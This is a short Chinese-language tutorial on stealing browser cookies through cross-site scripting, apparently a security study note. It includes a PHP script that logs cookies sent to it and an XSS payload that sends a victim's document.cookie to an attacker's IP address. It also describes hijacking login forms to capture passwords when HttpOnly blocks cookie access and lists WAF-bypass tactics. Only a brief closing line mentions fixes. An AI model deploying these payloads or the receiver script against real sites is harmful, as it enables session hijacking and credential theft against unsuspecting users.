cookie session

• 用户凭据：通过凭据可以判断对方身份信息
• cookie：存储本地 存活时间较长 小中型
• session：会话 存储服务器 存活时间较短 大型

基本操作盗取cookie

我们先准备一个接受的服务器，在服务器中创建一个页面来保存cookie，命名为cookie.php

<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
?>

然后创建cookie.txt 意思是将cookie保存到$cookie函数中然后保存到cookie.txt文件中

接着构造恶意xss语句(ip替换为自己的)

<script>document.location='http://192.168.43.15/cookie.php?cookie='+document.cookie;</script>

将恶意xss语句写入可能存在漏洞的地方即可

xss绕过httponly

如果在cookie中设置了HttpOnly属性，那么通过js脚本将无法读取到cookie信息，这样能有效的防止XSS攻击，但是并不能防止xss漏洞只能是防止cookie被盗取。

登陆xss平台选择合适的脚本攻击

保存读取

可以先读取他保存的数据 操作：先查看源代码获取form_list的值，然后复制到“获取浏览器明文密码”模块中 前提：需要存储型xss如留言等

没保存读取

可以使用劫持表单功能，直接获取用户名密码，也就不需要cookie 不过需要很多前提条件：xss语句写入登陆页面代码中，或者使他跳转到表单提交页面

XSS绕过WAF

常规WAF绕过思路

• 标签语法替换
• 特殊符号干扰
• 提交方式更改
• 垃圾数据溢出
• 加密解密算法
• 结合其他漏洞绕过

安全修复方案

开启 httponly,输入过滤，输出过滤等
PHP:http://www.zuimoge.com/212.html
JAVA:https://www.cnblogs.com/baixiansheng/p/9001522.html